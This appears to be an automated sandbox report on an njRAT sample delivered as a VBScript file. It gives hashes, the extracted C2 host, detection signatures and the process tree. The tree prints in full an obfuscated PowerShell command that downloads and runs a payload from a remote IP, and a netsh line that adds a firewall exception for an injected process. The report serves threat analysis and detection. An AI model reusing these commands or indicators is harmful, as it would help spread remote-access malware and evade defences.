njrat | f333e20bf5157aced9fa551fb2384457e8b3b2567ee0f2ef329aad33bfa66fb2

General

Target

REQUIREMENT.vbs
Size

2KB
MD5

b17c7601e3b5dad7c15fde1ff075772b
SHA1

a81a6b3de1470de726e4e31d143bbb5799834598
SHA256

f333e20bf5157aced9fa551fb2384457e8b3b2567ee0f2ef329aad33bfa66fb2
SHA512

504141a430351bc54fb02bbdf52887e0ccff1c82d8ffd967f8bd4356031c61ad920bfbee4e568a45fc43e7783f8203aeabac4292d74be5eca451cdb6edec9825

Score

10^/10

njrat hacked evasion suricata trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://13.112.210.240/bypass.txt

Extracted

Family

njrat

Version

0.7d

Botnet

HacKed

C2

njpeople.duckdns.org:6745

Mutex

730f7d095684724798010fdf6a67928d

Attributes

reg_key
730f7d095684724798010fdf6a67928d
splitter
|'|'|

Signatures

njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
suricata
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

4 1936 powershell.exe
7 1936 powershell.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 1936 set thread context of 584 1936 powershell.exe aspnet_compiler.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

1936 powershell.exe
1936 powershell.exe

flow	pid	process
4	1936	powershell.exe
7	1936	powershell.exe

description	pid	process	target process
PID 1936 set thread context of 584	1936	powershell.exe	aspnet_compiler.exe

pid	process
1936	powershell.exe
1936	powershell.exe

Suspicious use of AdjustPrivilegeToken 26 IoCs

Processes:

powershell.exeaspnet_compiler.exe

description	pid	process
Token: SeDebugPrivilege	1936	powershell.exe
Token: SeDebugPrivilege	584	aspnet_compiler.exe
Token: 33	584	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	584	aspnet_compiler.exe
Token: 33	584	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	584	aspnet_compiler.exe
Token: 33	584	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	584	aspnet_compiler.exe
Token: 33	584	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	584	aspnet_compiler.exe
Token: 33	584	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	584	aspnet_compiler.exe
Token: 33	584	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	584	aspnet_compiler.exe
Token: 33	584	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	584	aspnet_compiler.exe
Token: 33	584	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	584	aspnet_compiler.exe
Token: 33	584	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	584	aspnet_compiler.exe
Token: 33	584	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	584	aspnet_compiler.exe
Token: 33	584	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	584	aspnet_compiler.exe
Token: 33	584	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	584	aspnet_compiler.exe

Suspicious use of WriteProcessMemory 16 IoCs

Processes:

WScript.exepowershell.exeaspnet_compiler.exe

description	pid	process	target process
PID 1652 wrote to memory of 1936	1652	WScript.exe	powershell.exe
PID 1652 wrote to memory of 1936	1652	WScript.exe	powershell.exe
PID 1652 wrote to memory of 1936	1652	WScript.exe	powershell.exe
PID 1936 wrote to memory of 584	1936	powershell.exe	aspnet_compiler.exe
PID 1936 wrote to memory of 584	1936	powershell.exe	aspnet_compiler.exe
PID 1936 wrote to memory of 584	1936	powershell.exe	aspnet_compiler.exe
PID 1936 wrote to memory of 584	1936	powershell.exe	aspnet_compiler.exe
PID 1936 wrote to memory of 584	1936	powershell.exe	aspnet_compiler.exe
PID 1936 wrote to memory of 584	1936	powershell.exe	aspnet_compiler.exe
PID 1936 wrote to memory of 584	1936	powershell.exe	aspnet_compiler.exe
PID 1936 wrote to memory of 584	1936	powershell.exe	aspnet_compiler.exe
PID 1936 wrote to memory of 584	1936	powershell.exe	aspnet_compiler.exe
PID 584 wrote to memory of 1004	584	aspnet_compiler.exe	netsh.exe
PID 584 wrote to memory of 1004	584	aspnet_compiler.exe	netsh.exe
PID 584 wrote to memory of 1004	584	aspnet_compiler.exe	netsh.exe
PID 584 wrote to memory of 1004	584	aspnet_compiler.exe	netsh.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\REQUIREMENT.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1652

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $SZXDCFVGBHNJSDFGH = 'http://13|||||||||||||||||||||||||||||||112|||||||||||||||||||||||||||||||210|||||||||||||||||||||||||||||||240/bypass|||||||||||||||||||||||||||||||txt'.Replace('|||||||||||||||||||||||||||||||','.');$LLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLL='2^ ^5 ^^ 52 ^! ^7 ^8 ^e ^a ^d ^b ^^ ^5 ^! ^7 ^8 ^a 20 3d 20 27 !e ^5 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d ^5 !2 ^3 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 5^ 27 2e 52 !5 70 !c !1 !3 !5 28 27 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 27 2c 27 7^ 2e 57 27 29 2e 52 !5 70 !c !1 !3 !5 28 27 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 27 2c 27 !c ^9 ^5 ^e 27 29 3b 0a 2^ 53 58 ^^ ^3 ^! 5! ^7 ^2 ^8 ^e ^a 58 ^^ ^3 ^! 5! ^7 ^2 ^8 ^a ^b 20 3d 20 27 ^^ ^f 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a !1 ^^ 53 5^ 3c 3c 3c 3c 3c 3c 3c 3c 3c 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e ^7 27 2e 52 !5 70 !c !1 !3 !5 28 27 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 27 2c 27 57 !e ^c !f 27 29 2e 52 !5 70 !c !1 !3 !5 28 27 3c 3c 3c 3c 3c 3c 3c 3c 3c 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 27 2c 27 72 ^9 !e 27 29 3b 0a 2^ 53 57 58 ^^ ^5 ^3 52 ^! ^7 59 ^8 55 ^a ^9 53 ^^ ^! 5! ^7 ^8 ^a 20 3d 27 ^9 !0 ^5 58 28 !e !0 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d !0 !3 !0 5^ 20 2^ ^5 ^^ 52 ^! ^7 ^8 ^e ^a ^d ^b ^^ 3c 3c 3c 3c 3c 3c 3c 3c 3c 3c 3c 3c 3c 3c 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e ^7 ^2 ^8 ^e ^a 53 ^^ ^! ^7 ^8 29 27 2e 52 !5 70 !c !1 !3 !5 28 27 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 27 2c 27 !5 !0 57 !0 2d ^f !2 !a !0 ^5 27 29 2e 52 !5 70 !c !1 !3 !5 28 27 3c 3c 3c 3c 3c 3c 3c 3c 3c 3c 3c 3c 3c 3c 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 27 2c 27 ^5 ^! ^7 ^8 ^a 29 2e 2^ 53 58 ^^ ^3 ^! 5! ^7 ^2 ^8 ^e ^a 58 ^^ ^3 ^! 5! ^7 ^2 ^8 ^a ^b 28 2^ 53 5a 58 ^^ ^3 ^! 5! 27 29 3b 0a 2! 28 27 ^9 27 2b 27 ^5 58 27 29 28 2^ 53 57 58 ^^ ^5 ^3 52 ^! ^7 59 ^8 55 ^a ^9 53 ^^ ^! 5! ^7 ^8 ^a 20 2d ^a !f !9 !e 20 27 27 29 7c 2! 28 27 ^9 27 2b 27 ^5 58 27 29 3b'.Replace('^','4').Replace('!','6');Invoke-Expression (-join ($LLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLL -split ' ' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) }))
2⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1936

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:584

C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" "aspnet_compiler.exe" ENABLE
4⤵
PID:1004

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/584-97-0x0000000004880000-0x0000000004881000-memory.dmp

Filesize
4KB

Download
memory/584-93-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/584-91-0x000000000040747E-mapping.dmp

Download
memory/584-90-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/1004-96-0x0000000076641000-0x0000000076643000-memory.dmp

Filesize
8KB

Download
memory/1004-95-0x0000000000000000-mapping.dmp

Download
memory/1652-60-0x000007FEFBED1000-0x000007FEFBED3000-memory.dmp

Filesize
8KB

Download
memory/1936-73-0x0000000002770000-0x0000000002771000-memory.dmp

Filesize
4KB

Download
memory/1936-88-0x000000001B5D0000-0x000000001B5D1000-memory.dmp

Filesize
4KB

Download
memory/1936-70-0x0000000002740000-0x0000000002741000-memory.dmp

Filesize
4KB

Download
memory/1936-68-0x0000000002260000-0x0000000002261000-memory.dmp

Filesize
4KB

Download
memory/1936-85-0x00000000028C0000-0x00000000028C1000-memory.dmp

Filesize
4KB

Download
memory/1936-86-0x00000000028D0000-0x00000000028D1000-memory.dmp

Filesize
4KB

Download
memory/1936-87-0x00000000025BA000-0x00000000025D9000-memory.dmp

Filesize
124KB

Download
memory/1936-69-0x000000001C540000-0x000000001C541000-memory.dmp

Filesize
4KB

Download
memory/1936-89-0x0000000002900000-0x0000000002923000-memory.dmp

Filesize
140KB

Download
memory/1936-67-0x00000000025B4000-0x00000000025B6000-memory.dmp

Filesize
8KB

Download
memory/1936-66-0x00000000025B0000-0x00000000025B2000-memory.dmp

Filesize
8KB

Download
memory/1936-92-0x00000000025A0000-0x00000000025A1000-memory.dmp

Filesize
4KB

Download
memory/1936-65-0x00000000024A0000-0x00000000024A1000-memory.dmp

Filesize
4KB

Download
memory/1936-64-0x000000001AC60000-0x000000001AC61000-memory.dmp

Filesize
4KB

Download
memory/1936-63-0x0000000002370000-0x0000000002371000-memory.dmp

Filesize
4KB

Download
memory/1936-61-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads